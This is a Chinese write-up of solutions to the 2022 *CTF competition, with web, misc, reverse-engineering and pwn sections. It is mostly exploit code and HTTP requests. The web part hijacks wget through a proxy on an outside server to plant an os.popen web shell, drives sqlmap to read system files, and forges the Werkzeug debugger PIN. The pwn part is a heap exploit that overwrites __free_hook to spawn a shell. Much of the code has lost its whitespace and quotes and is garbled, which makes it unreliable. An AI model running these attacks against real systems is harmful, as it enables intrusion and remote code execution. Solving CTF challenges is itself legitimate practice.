2022startctf-wp

文章来源 :EDI安全

01

Web

1

oh-my-lotto

下载wget源码查看所有可以利⽤的环境变量

可以用于加载代理 所以我们上传一个代理配置 让wget设置 然后拦截对lotto的请求 修改返回包 即可获取flag。

把本地的burp转发到服务器上

ssh -p 22 -f -g -C -N -R 8080:127.0.0.1:8080 [root@120.26.59.13](mailto:root@120.26.59.13)7

host添加解析

启动一个web服务 返回代理配置

fromflaskimportFlask, make_responseimportsecretsapp = Flask(__name__)@app.route("/")defindex():lotto = []foriinrange(1,20):n = str(secrets.randbelow(40))lotto.append(n)r =\n.join(lotto)r ="http_proxy=http://120.26.59.137:8080"response = make_response(r)response.headers[Content-Type] =text/plainresponse.headers[Content-Disposition] =attachment; filename=lotto_result.txtreturnresponseif__name__ =="__main__":app.run(debug=True, host=0.0.0.0, port=80)

本地启动以后 爆破一下md5

上传文件指定代理为我的服务器

POST/forecastHTTP/1.1Host: 121.36.217.177:53002User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------2363992665965896981350789360Content-Length: 249Origin: http://127.0.0.1:8880Connection: closeReferer: http://127.0.0.1:8880/forecastUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-Forwarded-For: 1.1.1.1X-Originating-IP: 1.1.1.1X-Remote-IP: 1.1.1.1X-Remote-Addr: 1.1.1.1-----------------------------2363992665965896981350789360Content-Disposition: form-data; name="file"; filename="2.jpg"Content-Type: image/jpeghttp_proxy=http://120.26.59.137:8080-----------------------------2363992665965896981350789360--

加载代理请求url 返回内容可控

POST/lottoHTTP/1.1Host: 121.36.217.177:53002User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------134338874213176516492993923776Content-Length: 324Origin: http://127.0.0.1:8880Connection: closeReferer: http://127.0.0.1:8880/lottoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-Forwarded-For: 1.1.1.1X-Originating-IP: 1.1.1.1X-Remote-IP: 1.1.1.1X-Remote-Addr: 1.1.1.1-----------------------------134338874213176516492993923776Content-Disposition: form-data; name="lotto_key"WGETRC-----------------------------134338874213176516492993923776Content-Disposition: form-data; name="lotto_value"/app/guess/forecast.txt-----------------------------134338874213176516492993923776--

2

oh-my-lotto-revenge

出题人开启了debug [所以可以直接使用代理来替换app.py](http://所以可以直接使用代理来替换app.py)

from flaskimportFlask, make_responseimportsecretsapp = Flask(__name__)@app.route("/")def index():lotto = []foriinrange(1,20):n = str(secrets.randbelow(40))lotto.append(n)r =\n.join(lotto)r ="http_proxy=http://120.26.59.137:8080"r =open("exp1.py",r).read()response = make_response(r)response.headers[Content-Type] =text/plainresponse.headers[Content-Disposition] =attachment; filename=app.pyreturnresponseif__name__ =="__main__":app.run(debug=True, host=0.0.0.0, port=80)主要就是shell路由@app.route("/edi", methods=[GET,POST])def index():returnos.popen(request.query_string.get(edi)).read()

出题人用的是gunicorn来保持python运行 不会及时的重载(可能你以为这就结束了?)

完全可以使用bp拦截数据包 直到gunicorn重启worker。

你要做的就是不停的请求shell路由

3

oh-my-notepro

写个控制sqlmap的脚本

importosimportreimportsysimporthashlibfromitertoolsimportchainAuthor: R1CH0ND from EDISECUSAGE:python3 readanything.py web1.txtdefload(dirname):returnGeneric_Config +"--tech=S --sql-query={}".format("load data local infile \"{}\" into table shit".format(dirname))defread():returnGeneric_Config +"--tech=E --sql-query=\"{}\"".format("select go from shit")defloadNread(filename):os.system(Generic_Config +"--tech=S --sql-query=CREATE TABLE shit (go TEXT)")os.system(load(filename))r = os.popen(read())ret = r.read()r.close()returnretprint(rv)dirs = {wangka:"/sys/class/net/eth0/address",mid1:"/proc/sys/kernel/random/boot_id",mid2:"/proc/self/cgroup"}packfile = sys.argv[1]Generic_Config ="sqlmap -r {} --random-agent --fresh-queries --batch -p note_id --dbms=mysql ".format(packfile)wangka = re.findall(r"(\w+:\w+:\w+:\w+:\w+:\w+)",loadNread("/sys/class/net/eth0/address"))[0]cg = re.findall(r"docker/(\w+)", loadNread("/proc/self/cgroup"))[0]mid ="1cc402dd0e11d5ae18db04a6de87223d"probably_public_bits = [ctf/etc/passwdflask.app,默认值Flask,默认值/usr/local/lib/python3.8/site-packages/flask/app.py报错得到]private_bits = [str(int(wangka.replace(":",""),16)),/sys/class/net/eth0/address 16进制转10进制machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup/proc/self/cgroupmid+cg,]h = hashlib.sha1()forbitinchain(probably_public_bits, private_bits):ifnotbit:continueifisinstance(bit, str):bit = bit.encode(utf-8)h.update(bit)h.update(bcookiesalt)cookie_name =__wzd+ h.hexdigest()[:20]num =NoneifnumisNone:h.update(bpinsalt)num = (%09d% int(h.hexdigest(),16))[:9]rv =NoneifrvisNone:forgroup_sizein5,4,3:iflen(num) % group_size ==0:rv =-.join(num[x:x + group_size].rjust(group_size,0)forxinrange(0, len(num), group_size))breakelse:rv = numprint(rv)

抓个包

GET/view?note_id=yvsn3yt4kdhtl2zfqsscl5i6l12mma0pHTTP/1.1Host: 124.70.185.87:5002User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: session=eyJjc3JmX3Rva2VuIjoiY2ViOWI0NWFkYjM2ZmQ3N2M1NTI0NDJmNjUwODJiZDI0YzcyOTgzNiIsInVzZXJuYW1lIjoiYWRtaW4ifQ.Ylotsg.tKGQ3pgsO1RTw51C7lcCAgA0YfYUpgrade-Insecure-Requests: 1

然后执行python3readanything.pyweb1.txt

把pin码搞出来

靶机挨个试,import os;os.system(/readflag)

4

oh-my-grafana

下载xxxx

admin5f989714e132c9b04d4807dafeb10ade [http://124.70.163.46:3000](

蹭车 有配好的datasource

后来发现都是默认grafana grafana

sql查询

02

Misc

1

babyFL

train,多试几次

importtensorflowimportosimporttracebackimportnumpyasnpfromtensorflow.kerasimportSequentialfromtensorflow.keras.layersimportDense, Conv2D, Flatten, MaxPooling2Dfromtensorflowimportkerasfromtensorflow.keras.modelsimportload_modelfromtensorflow.keras.datasetsimportmnistparticipant_number =20defnew_model():model = Sequential()model.add(Conv2D(10, (3,3), input_shape=(28,28,1)))model.add(MaxPooling2D(pool_size=(2,2)))model.add(Conv2D(20, (3,3)))model.add(Flatten())model.add(Dense(units=100, activation=relu))model.add(Dense(units=10, activation=softmax))model.compile(loss=keras.losses.SparseCategoricalCrossentropy(), metrics=[accuracy],optimizer=keras.optimizers.Adam(lr=0.001))returnmodeldefload_test_data():(_, _), (x, y) = mnist.load_data()l = len(y)foriinrange(l):y[i] =9- y[i]x = x.reshape(-1,28,28,1)returnx, ydeftrain_models(a=model):(x, y), (_, _) = mnist.load_data()ifa==mymodel:l = len(y)foriinrange(l):y[i] =9- y[i]x = x.reshape(-1,28,28,1)ifa==mymodel:model = new_model()model.fit(x, y, batch_size=64, epochs=6)foriinrange(participant_number):model.save("./{}/".format(a)+str(i))else:foriinrange(4):model = new_model()model.fit(x, y, batch_size=64, epochs=5)model.save("./{}/".format(a)+str(5*i))model.save("./{}/".format(a)+str(5*i+1))model.save("./{}/".format(a)+str(5*i+2))model.save("./{}/".format(a)+str(5*i+3))model.save("./{}/".format(a)+str(5*i+4))defaggregation(parameters):print(aggregation)weights = []forlayerinparameters:sum =0l = len(layer)fortempinlayer:sum = sum + tempweights.append(sum / l)weights.append(layer[2])model = new_model()l = len(model.get_weights())model.set_weights(weights)returnmodeldeftest(model):print(test)my_x, my_y = load_test_data()loss, acc = model.evaluate(my_x, my_y, batch_size=64)print(acc)ifacc >0.95:print(great!)f = open(./flag)print(f.read())else:print("you fail", acc)defload_parameters(a=model):print(load parameter)parameters = []models = []foriinrange(participant_number):models.append(load_model("./{}/".format(a)+str(i)))foriinrange(8):layer = []forjinrange(participant_number):temp = models[j].get_weights()layer.append(temp[i])parameters.append(layer)returnparametersdefget_val(arr):iflen(arr.shape) >1:fortempinarr:get_val(temp)else:l = len(arr)foriinrange(l):arr[i] = float(input())defget_input_parameter(parameters):print(get input parameter)forlayerinparameters:input_weight = np.zeros(layer[0].shape)print("next layer:")get_val(input_weight)layer.append(input_weight)returnparametersdefcal_input_para(raw_para,my_para):weights = []foriinrange(len(raw_para)):layer_raw=raw_para[i]layer_my=my_para[i]sum =0l = len(my_para)fortempinlayer_my:sum = sum + tempmy_weight=sum / lsum =0l = len(layer_raw)+1fortempinlayer_raw:sum = sum + tempweight=l*my_weight-sumweights.append(weight)weights.append(layer[2])returnweightsdefget_input_parameter2(parameters,out):print(get input parameter)foriinrange(len(parameters)):layer=parameters[i]input_weight = np.zeros(layer[0].shape)input_weight = out[i]print("next layer:")get_val2(input_weight)layer.append(input_weight)returnparametersdefget_val2(arr):iflen(arr.shape) >1:fortempinarr:get_val2(temp)else:l = len(arr)foriinrange(l):arr[i] = float(1)train_models()train_models(mymodel)parameters1 = load_parameters()a=load_parameters()parameters2 = load_parameters(mymodel)parameters_out = cal_input_para(a,parameters2)get_input_parameter2(a,parameters_out)importpicklepickle.dump(a,open(11.txt,wb))model = aggregation(parameters1)test(model)model = aggregation(parameters2)test(model)model = aggregation(a)test(model)

提交参数

importpicklea=pickle.load(open(11.txt,rb))deffoo2(arr,r):iflen(arr.shape) >1:fortempinarr:print(a)foo2(temp,r)else:l = len(arr)foriinrange(l):r.sendline(str(arr[i]))print(arr[i])arr[i] = float(input())deffoo(parameters,r):foriinrange(8):print(layer: {}.format(i))input_weight = a[i]foo2(input_weight[20],r)frompwnimport*r=remote("124.70.158.154",8081)r.recvuntil(next layer:\n)foo(a,r)r.interactive()

2

Alices challenge

核心原理是深度学习模型+梯度数据⇒(还原)⇒训练样本

找到这里[https://dlg.mit.edu/](https://dlg.mit.edu/)

理解梯度泄露攻击基本原理,代码稍微改下就能跑出来。

解题关键点有下面2个:

(1)逆向的模型结构

classAliceNet2(nn.Module):def __init__(self):super(AliceNet2,self).__init__()act = nn.Sigmoidself.conv = nn.Sequential(nn.Conv2d(3,12, kernel_size=5, padding=2, stride=2),act(),nn.Conv2d(12,12, kernel_size=5, padding=2, stride=2),act(),nn.Conv2d(12,12, kernel_size=5, padding=2, stride=1),act(),nn.Conv2d(12,12, kernel_size=5, padding=2, stride=1),act(),)self.fc = nn.Sequential(nn.Linear(768,200))def forward(self, x):out=self.conv(x)out=out.view(out.size(0),-1)out=self.fc(out)returnout

(2)加载题目给出的梯度

dy_dx = torch.autograd.grad(y, net.parameters())dy_dx=torch.load(0.tensor)0-24Exchange gradient with other training nodesoriginal_dy_dx = list((_.detach().clone()for_indy_dx))

结果如下:

03

Re

1

Naci

includedefineROL(x, y) ((x<>(32-y)))unsignedintdata[] = {0x04050607,0x00010203,0x0C0D0E0F,0x08090A0B,0xCD3FE81B,0xD7C45477,0x9F3E9236,0x0107F187,0xF993CB81,0xBF74166C,0xDA198427,0x1A05ABFF,0x9307E5E4,0xCB8B0E45,0x306DF7F5,0xAD300197,0xAA86B056,0x449263BA,0x3FA4401B,0x1E41F917,0xC6CB1E7D,0x18EB0D7A,0xD4EC4800,0xB486F92B,0x8737F9F3,0x765E3D25,0xDB3D3537,0xEE44552B,0x11D0C94C,0x9B605BCB,0x903B98B3,0x24C2EEA3,0x896E10A2,0x2247F0C0,0xB84E5CAA,0x8D2C04F0,0x3BC7842C,0x1A50D606,0x49A1917C,0x7E1CB50C,0xFC27B826,0x5FDDDFBC,0xDE0FC404,0xB2B30907};intmain(void){unsignedintx = , y = , p;for(inti =0; i <44; i++){p = (ROL(x,1)&ROL(x,8))^ROL(x,2)^y^data[i];y = x;x = p;}printf("%x, %x", x, y);}

includeincludedefineROL(x, y) ((x<>(32-y)))unsignedintdata[] = {0x04050607,0x00010203,0x0C0D0E0F,0x08090A0B,0xCD3FE81B,0xD7C45477,0x9F3E9236,0x0107F187,0xF993CB81,0xBF74166C,0xDA198427,0x1A05ABFF,0x9307E5E4,0xCB8B0E45,0x306DF7F5,0xAD300197,0xAA86B056,0x449263BA,0x3FA4401B,0x1E41F917,0xC6CB1E7D,0x18EB0D7A,0xD4EC4800,0xB486F92B,0x8737F9F3,0x765E3D25,0xDB3D3537,0xEE44552B,0x11D0C94C,0x9B605BCB,0x903B98B3,0x24C2EEA3,0x896E10A2,0x2247F0C0,0xB84E5CAA,0x8D2C04F0,0x3BC7842C,0x1A50D606,0x49A1917C,0x7E1CB50C,0xFC27B826,0x5FDDDFBC,0xDE0FC404,0xB2B30907};unsignedintenc[] = {0xFDF5C266,0x7A328286,0xCE944004,0x5DE08ADC,0xA6E4BD0A,0x16CAADDC,0x13CD6F0C,0x1A75D936,0};unsignedintkey[] = {0x03020100,0x07060504,0x0B0A0908,0x0F0E0D0C};voiddecipher(unsignedintnum_rounds,unsignedintv[2],unsignedintconstkey[4]){unsignedinti;unsignedintv0=v[0], v1=v[1], delta=0x10325476, sum=delta*num_rounds;unsignedintx, y, p;for(i=0; i < num_rounds; i++){v1 -= (((v0 <<4) ^ (v0 >>5)) + v0) ^ (sum + key[(sum>>11) &3]);sum -= delta;v0 -= (((v1 <<4) ^ (v1 >>5)) + v1) ^ (sum + key[sum &3]);}x = v1, y = v0;for(inti =0; i <44; i++){p = (ROL(y,1)&ROL(y,8))^ROL(y,2)^x^data[43-i];x = y;y = p;}v[0] = x, v[1] = y;}intmain(void){unsignedintx, y, p;for(inti =0; i <4; i++){unsignedint*tmp = enc+2*i;decipher(pow(2, i+1), enc+2*i, key);for(inti =0; i <2; i++)for(intj =0; j <4; j++)printf("%c", ((char*)&tmp[i])[3-j]);}}

2

Simple File System

查看文件信息

elf文件

静态分析

查看字符串 查找到这个关键词

找到这个关键逻辑 经过分析可以知道 当sub_1E16函数第三个参数等于1时 才能真正打开flag文件。

经过 下图加密函数后 输出到image.flag文件当中。

动调得到值

v4 = 0xDEEDBEEF

a2 = 0x1000

不过 我们既然指导加密函数了 我们就可以输入*CTF去加密 然后找到flag文件里面得密文

找到密文为

0x00, 0xD2, 0xFC, 0xD8, 0xA2, 0xDA, 0xBA, 0x9E, 0x9C, 0x26, 0xF8, 0xF6, 0xB4, 0xCE, 0x3C, 0xCC, 0x96, 0x88, 0x98, 0x34, 0x82, 0xDE, 0x80, 0x36, 0x8A, 0xD8, 0xC0, 0xF0, 0x38, 0xAE, 0x40

exp

data=[0x00, 0xD2, 0xFC, 0xD8, 0xA2, 0xDA, 0xBA, 0x9E, 0x9C, 0x26, 0xF8, 0xF6, 0xB4, 0xCE, 0x3C, 0xCC, 0x96, 0x88, 0x98, 0x34, 0x82, 0xDE, 0x80, 0x36, 0x8A, 0xD8, 0xC0, 0xF0, 0x38, 0xAE, 0x40]v4=[0xEF, 0xBE, 0xED, 0xDE]defdcry(data,v4):fori in range(len(data)):v5=data[i]v5=(v5 >> 3) | (v5 << 5)&0xffv5^= v4[3]v5=(v5 >> 4) | (v5 << 4)&0xffv5^= v4[2]v5=(v5 >> 5) | (v5 << 3)&0xffv5^= v4[1]v5=(v5 >> 6) | (v5 << 2)&0xffv5^= v4[0]v5=(v5 >> 7) | (v5 << 1)&0xffdata[i]=v5returndataflag=dcry(data,v4)print(flag)print(.join(map(chr,flag)))

04

Pwn

1

examination

-*- encoding: utf-8 -*-importsysimportosimportrequestsfrompwnimport*binary =./examinationos.system(chmod +x %s%binary)context.update( os =linux, arch =amd64,timeout =1)context.binary = binarycontext.log_level =debugelf = ELF(binary)libc = elf.libclibc = ELF()DEBUG =0ifDEBUG:libc = elf.libcp = process(binary)else:host =124.70.130.92port =60001p = remote(host,port)l64 =lambda: ras(u64(p.recvuntil(\x7f)[-6:].ljust(8,\x00)))l32 =lambda: ras(u32(p.recvuntil(\xf7)[-4:].ljust(4,\x00)))uu64=lambdaa          : ras(u64(p.recv(a).ljust(8,\x00)))uu32=lambdaa          : ras(u32(p.recv(a).ljust(4,\x00)))rint=lambdax =12: ras(int( p.recv(x) ,16))sla =lambdaa,b        : p.sendlineafter(str(a),str(b))sa  =lambdaa,b        : p.sendafter(str(a),str(b))lg  =lambdaname,data  : p.success(name +: \033[1;36m 0x%x \033[0m% data)se  =lambdapayload    : p.send(payload)rl  =lambda: p.recv()sl  =lambdapayload    : p.sendline(payload)ru  =lambdaa          : p.recvuntil(str(a))defras( data ):lg(leak, data)returndatadefdbg( b = null):if(b == null):gdb.attach(p)pause()else:gdb.attach(p,b %s%b)defcmd(num):sla(>>,num)deftch_to_std():cmd(5)sla(<0.teacher/1.student>:,1)defstd_to_tch():cmd(5)sla(<0.teacher/1.student>:,0)defadd_std(num):cmd(1)sla(questions, num)defscore():cmd(2)defone_add(addr):cmd(2)sla(addr:, addr)defadd_cmt(idx , size , text =a):cmd(3)sla(>, idx)sla(size of comment:, size)sa(enter your comment:\n, text)defedit_cmt(idx , text =a):cmd(3)sla(>, idx)sa(enter your comment:\n, text)defdelete(idx ):cmd(4)sla(choose?, idx)defchid(idx ):cmd(6)sla(id:, idx)one_gad = one_gadget(libc.path)defattack():sla(<0.teacher/1.student>:,0)add_std(1)add_cmt(0,0x18)add_std(1)add_cmt(1,0x3f8)add_std(1)add_std(1)tch_to_std()cmd(3)chid(1)cmd(3)std_to_tch()score()tch_to_std()cmd(2)ru(0x)heap_base = rint() &0xfffffffff000lg(target, heap_base)sla(addr:, str(heap_base +0x2e0) +\x00)chid(1)one_add(str(heap_base +0x2e0) +\x00)std_to_tch()edit_cmt(0,a*0x18+ p16(0x400+0x50+1))delete(1)add_std(1)add_cmt(2,0x3f8)edit_cmt(0,a*0x18+ p16(0x400+0x50+1))delete(3)add_std(1)tch_to_std()chid(2)score()__malloc_hook = l64() -0x70libc.address = __malloc_hook - libc.sym[__malloc_hook]system_addr = libc.sym[system]__free_hook = libc.sym[__free_hook]binsh_addr = libc.search(/bin/sh).next()lg(__free_hook,__free_hook)std_to_tch()add_std(1)payload = flat(heap_base +0x390,0,0,0,0,0x21,1,__free_hook-0x8,0x20)edit_cmt(2, payload)edit_cmt(4, flat(/bin/sh\x00, system_addr ))delete(4)dbg()p.success(getShell())p.interactive()attack()

侵权请私聊公众号删文

上一篇:马杜罗演讲时遭遇未遂袭击 无人机爆炸现场视频曝光
下一篇:支付宝的十大支付方式

欢迎扫描关注我们的微信公众平台!

欢迎扫描关注我们的微信公众平台!